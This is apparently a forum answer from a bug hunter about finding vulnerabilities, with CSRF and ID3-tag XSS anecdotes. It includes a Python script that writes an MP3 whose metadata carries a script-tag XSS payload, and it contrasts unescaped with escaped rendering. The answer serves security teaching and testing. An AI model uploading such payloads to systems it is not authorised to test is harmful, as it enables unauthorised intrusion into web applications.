2 Answers
2

I audit a lot of code, I write exploits, and I have accumulated more than 50 CVEs over the course of about 6 years of bug hunting.

When I went on my first serious bug hunt I was looking for weak projects that had not been extensively audited by the community (or milw0rm back in the day). To do this I used SourceForge's Advanced Search, which has changed a lot. Basically I was looking for a PHP project that people were downloading and using, but that wasn't very popular. Let's say around 1,000 downloads and less than 1 year old. I found Ultimate PHP Board, which turned out to be very insecure.

As time progressed I got bored with insecure projects, so I changed my tactics entirely and started going after popular projects. For example, I exploited PHPMyAdmin, which is the most downloaded PHP application.

After years of penetration testing and application development you get a kind of sixth sense for how the code works and where the problem areas can be. You can look at a piece of functionality, write an implementation in your head, and pick out where things could go wrong. So on a penetration test I always ask myself the same question: "What is the worst that could happen?" And then I go out and focus my testing based on this question.

I'll give you a good example. I saw an advertisement for Canonical Landscape (Canonical being the maker of Ubuntu). In the ad it showed a feature of Landscape where you could execute a command on every machine you own as root. I thought to myself, "What if it was vulnerable to CSRF?" I signed up for a free trial, and sure enough, you could gain remote root on every machine using a single forged HTTP request. Ouch! (I also got remote root on cPanel with CSRF, and I earned a severity metric :)

Another flaw I found was in Google Music: I uploaded an MP3 that had JavaScript in all of the ID3 tags. Sure enough, the artist and album names were being printed to the page, and I got $500 from the bug bounty program with my very first test. One of the reasons why I chose this input is because I knew it wouldn't be exercised by a dumb vulnerability scanner. It's as if I knew it would fail ahead of time. That kind of innate understanding only comes with years of practice.
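The ID3-tag test described in the answer above, as an added example that is not part of the original answer or of any Google product: a dependency-free Python script that writes an ID3v2.3 tag whose text frames (title, artist, album) carry an XSS canary, wraps it in a constructed stand-in for an MP3 file, reads the frames back the way a server-side tagger would, and contrasts a rendering path that interpolates the strings raw with one that HTML-escapes them. The canary string, the frame set and the dummy audio bytes are assumptions chosen for the demonstration.

```python
import html
import struct

# Constructed XSS canary for the demo; substitute whatever your target's bounty rules allow.
CANARY = '<script>alert(1)</script>'


def _syncsafe(n: int) -> bytes:
    """Encode n (< 2**28) as the 4-byte 'syncsafe' integer the ID3v2 header uses (7 bits per byte)."""
    if not 0 <= n < (1 << 28):
        raise ValueError("tag size does not fit in 28 bits")
    return bytes([(n >> 21) & 0x7F, (n >> 14) & 0x7F, (n >> 7) & 0x7F, n & 0x7F])


def _unsyncsafe(b: bytes) -> int:
    return (b[0] << 21) | (b[1] << 14) | (b[2] << 7) | b[3]


def build_id3v2(frames: dict) -> bytes:
    """Build an ID3v2.3 tag whose text frames (TIT2, TPE1, TALB, ...) carry the given strings.

    Each frame is: 4-byte id, 4-byte big-endian size, 2 flag bytes, then a text-encoding byte
    (0x00 = ISO-8859-1, assumed here for simplicity) followed by the string.
    """
    body = b""
    for frame_id, text in frames.items():
        fid = frame_id.encode("ascii")
        if len(fid) != 4 or not fid.startswith(b"T"):
            raise ValueError("only 4-character text frames (T***) are supported here")
        payload = b"\x00" + text.encode("latin-1")
        body += fid + struct.pack(">I", len(payload)) + b"\x00\x00" + payload
    # Header: "ID3", version 3.0, flags 0, syncsafe size of everything after the 10-byte header.
    return b"ID3" + b"\x03\x00" + b"\x00" + _syncsafe(len(body)) + body


def make_test_mp3(title: str, artist: str, album: str) -> bytes:
    """Tag followed by a constructed 4-byte MPEG frame header (not real audio) so the file 'looks' like an MP3."""
    fake_audio = b"\xff\xfb\x90\x00"
    return build_id3v2({"TIT2": title, "TPE1": artist, "TALB": album}) + fake_audio


def parse_id3v2(data: bytes) -> dict:
    """Minimal ID3v2.3 reader, as a server-side tagger might do it: returns {frame_id: text} for text frames."""
    if data[:3] != b"ID3" or data[3] != 3:
        raise ValueError("not an ID3v2.3 tag")
    tag_size = _unsyncsafe(data[6:10])
    pos, end = 10, 10 + tag_size
    frames = {}
    while pos + 10 <= end:
        fid = data[pos:pos + 4]
        if fid == b"\x00\x00\x00\x00":  # zero padding marks the end of the frame list
            break
        size = struct.unpack(">I", data[pos + 4:pos + 8])[0]
        payload = data[pos + 10:pos + 10 + size]
        if fid.startswith(b"T") and payload[:1] == b"\x00":
            frames[fid.decode("ascii")] = payload[1:].decode("latin-1")
        pos += 10 + size
    return frames


def render_unsafe(tags: dict) -> str:
    """The bug class the answer describes: tag text dropped straight into the page markup."""
    return "<li>{} - {}</li>".format(tags.get("TPE1", ""), tags.get("TALB", ""))


def render_safe(tags: dict) -> str:
    """Same view with contextual output encoding; the canary becomes inert text."""
    return "<li>{} - {}</li>".format(html.escape(tags.get("TPE1", "")), html.escape(tags.get("TALB", "")))


if __name__ == "__main__":
    mp3 = make_test_mp3("track", CANARY, CANARY)
    with open("canary.mp3", "wb") as f:
        f.write(mp3)  # upload this to the target and look for the canary in the rendered page
    tags = parse_id3v2(mp3)
    print("unsafe:", render_unsafe(tags))
    print("safe:  ", render_safe(tags))
```

Running the script writes `canary.mp3` and prints both renderings; the unsafe one contains a live `<script>` element, the safe one only `&lt;script&gt;`. The same technique generalises to any metadata a site extracts and displays (EXIF, PDF document info, filenames inside archives), which is exactly the kind of input a scanner that only fuzzes form fields will never exercise.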